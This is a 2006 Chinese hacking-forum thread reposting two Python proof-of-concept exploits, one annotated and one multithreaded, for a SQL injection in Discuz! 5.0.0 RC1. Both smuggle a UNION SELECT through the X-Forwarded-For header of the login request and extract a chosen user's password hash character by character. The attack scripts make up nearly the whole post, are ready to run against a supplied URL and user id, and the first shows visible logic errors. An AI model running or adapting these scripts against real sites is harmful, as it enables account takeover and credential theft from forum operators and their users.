[转载]Discuz! 5.0.0 RC1 SQL injection PoC (python版)

pt007

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 209
精华: 30
积分: 3816
阅读权限: 100
性别: 男
在线时间: 433 小时
注册时间: 2005-9-9
最后登录: 2008-7-23

发短消息
加为好友
当前离线

楼主大中小发表于 2006-10-26 22:23 只看该作者

[转载]Discuz! 5.0.0 RC1 SQL injection PoC (python版)

原创作者：wofeiwo

#wofeiwo原创，pt007给程序做了一下注释，以方便其它人的学习：
#!c:\python24\pyton
# Discuz! 5.0.0 RC1 SQL injection PoC
# Author: wofeiwo thx superheis help
# Date: Aug 12th 2006

import sys
import httplib
from urlparse import urlparse
from time import sleep

def injection(lenthofpass,realurl,path):
sys.stdout.write('[+]The uid='+sys.argv[2]+' password hash is: \n')
for num in range(1,lenthofpass+1): #相当于[1,...,32],num代表32位的MD5值
   ran=range(97, 123) #ran=[97,...,122]，ASCII码的a-z
   #for a1 in range(65,91): #a1=[65,90],ASCII码的A-Z
      #  ran.append(a1)
   for a in range(48, 58): #a=[48,...,57],ASCII码的0-9
      ran.append(a) #将序列a加入到序列ran中

   for i in ran: #遍历ran序列,包括全部小写字母和数字

      query = '\' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + str(num) + ',1))=' + str(i) + ' /*'
      #下面是一个字典:
      header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*','Referer':'http://' + realurl[1] + path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
      data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
      #print header
      #sys.exit(1)
      http = httplib.HTTPConnection(realurl[1]) #连接到如：httplib.HTTPConnection('www.cwi.nl')
      http.request("POST", path + "logging.php?action=login&",data , header) #发送POS数据包
      #sleep(1)
      response = http.getresponse() #得到服务的响应包
      re1 = response.read() #读出所有响应数据并存入ret1中
      #print "re1中返回的内容为:"
      #print re1
      if re1.find('SELECT') ==1: #re1中是否含有SELECT字符，是为1，否返回-1
         print '[-] Unvalnerable host' #不存在漏洞
         print '[-] Exit..'
         sys.exit(1);

      elif re1.find('ip3') == -1:#re1中是否含有ip3字符，是为1，否返回-1
         sys.stdout.write(chr(i)) #输出正确的MD5密码值
         #print chr(i)
         http.close()
         #sleep(1)
         #break

         #print re1
         #print '-----------------------------------------------'
         http.close()
         #sleep(1)
         sys.stdout.write('\n') #打印回车

def main ():
print 'Discuz! 5.0.0 RC1 SQL injection exploit'
print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'

if len(sys.argv) == 3:
url = urlparse(sys.argv[1])
if url[2:-1] != '/': #从元组中第三个到倒数第二个参数
   u = url[2] + '/'
else:
   u = url[2] #u=/dz/
else:
print "Usage: %s <url> <uid>" % sys.argv[0]
print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]
sys.exit(0)

lenth = 32 #长度为32
print '[+] Connect %s' % url[1]
print '[+] Trying...'
print '[+] Plz wait a long long time...'

injection(lenth, url, u)

print '[+] Finished'

if __name__ == '__main__': main()

每个人都有属于自已的世界，人生因此而精彩，HACK就是我的世界！

TOP

我非我

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 150
精华: 6
积分: 5639
阅读权限: 100
性别: 男
在线时间: 189 小时
注册时间: 2005-2-4
最后登录: 2008-1-31

发短消息
加为好友
当前离线

沙发大中小发表于 2006-10-27 20:16 只看该作者

呵呵,练手的程序.让人见笑了
我再发个多线程版本的python程序.也是练手用,算法和多线程同步都没做好.
真正效率高的,还是要看c语言版本算法精良的.

复制内容到剪贴板

代码:

#!/usr/bin/python

# Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)

# Author: wofeiwo

# Bug find by Defence80 ([url]http://www.defence80.com[/url])

# Date: Aug 13th 2006



import sys 

import httplib

import threading

from urlparse import urlparse

from time import sleep



password = {1:&#39;&#39;,2:&#39;&#39;,3:&#39;&#39;,4:&#39;&#39;,5:&#39;&#39;,6:&#39;&#39;,7:&#39;&#39;,8:&#39;&#39;,9:&#39;&#39;,10:&#39;&#39;,11:&#39;&#39;,12:&#39;&#39;,13:&#39;&#39;,14:&#39;&#39;,15:&#39;&#39;,16:&#39;&#39;,17:&#39;&#39;,18:&#39;&#39;,19:&#39;&#39;,20:&#39;&#39;,21:&#39;&#39;,22:&#39;&#39;,23:&#39;&#39;,24:&#39;&#39;,25:&#39;&#39;,26:&#39;&#39;,27:&#39;&#39;,28:&#39;&#39;,29:&#39;&#39;,30:&#39;&#39;,31:&#39;&#39;,32:&#39;&#39;}



class creatthread (threading.Thread):

   def __init__ (self, threadname, url, u):

      self.realurl = url

      self.realu = u

      threading.Thread.__init__(self, name = threadname)

      

   def run (self):

      lenth = 32

      injection(lenth, self.realurl, self.realu, self.getName())      

   

def  injection (lenthofpass, realurl, path, num):

      

      ran = range(97, 123)

      for a in range(48, 58): ran.append(a)



      for i in ran:

   

        query = &#39;\&#39; union select 122,122,122,122,122,122,122,122 from cdb_members where uid=&#39; + sys.argv[2] + &#39; AND ascii(substring(CONCAT(password),&#39; + num + &#39;,1))=&#39; + str(i) + &#39; /*&#39;

        header = {&#39;Accept&#39;:&#39;image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*&#39;,&#39;Referer&#39;:&#39;http://&#39; + realurl[1] + path + &#39;logging.php?action=login&#39;,&#39;Accept-Language&#39;:&#39;zh-cn&#39;,&#39;Content-Type&#39;:&#39;application/x-www-form-urlencoded&#39;,&#39;User-Agent&#39;:&#39;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)&#39;,&#39;Connection&#39;:&#39;Keep-Alive&#39;,&#39;Cache-Control&#39;:&#39;no-cache&#39;,&#39;X-Forwarded-For&#39;:query,&#39;Cookie&#39;:&#39;cdb_sid=70KRjS; cdb_cookietime=2592000&#39;}

        data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"

        #print header

        #sys.exit(1)

        http = httplib.HTTPConnection(realurl[1])

        http.request("POST", path + "logging.php?action=login&",data , header)

        sleep(1)

        response = http.getresponse()

        re1 = response.read()

        if re1.find(&#39;SELECT&#39;) == -1:

           print &#39;[-] Unvalnerable host&#39;

           print &#39;[-] Exit..&#39;

           sys.exit(1);

   

        elif re1.find(&#39;ip3&#39;) == -1:

           password[int(num)] = chr(i)

           #print &#39;[+] password &#39; + num + &#39;: &#39; + chr(i)

           http.close()

           sleep(1)

           break

        #print re1

        #print &#39;-----------------------------------------------&#39;

        http.close()

        sleep(1)



def main ():

   print &#39;Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)&#39;

   print &#39;Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n&#39;



   if len(sys.argv) == 3:

      url = urlparse(sys.argv[1])

      if url[2:-1] != &#39;/&#39;:

        u = url[2] + &#39;/&#39;

      else: 

        u = url[2]

   else:

      print "Usage: %s <url> <uid>" % sys.argv[0]

      print "Example: %s [url]http://127.0.0.1/dz/[/url] 1" % sys.argv[0]

      sys.exit(0)



   print &#39;[+] Connect %s&#39; % url[1]

   print &#39;[+] Begin threads...&#39;

   print &#39;[+] Plz wait a long long time...&#39;

   

   for a in range(1,33) :

      thread = creatthread(str(a), url, u)

      thread.start()

   

   while threading.activeCount() != 1: 

      continue

   else:

      sys.stdout.write( &#39;[+] The uid=&#39; + sys.argv[2] + &#39; password hash is: &#39; )

      for n in range(1, 33) :

        sys.stdout.write(password[n])

      sys.stdout.write(&#39;\n[+] Finished \n&#39;)

      



if __name__ == &#39;__main__&#39;: main()

http://www.phpweblog.net/GaRY/

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 脚本程序设计{ All Kinds of Scripts } » [转载]Discuz! 5.0.0 RC1 SQL injection PoC (python版)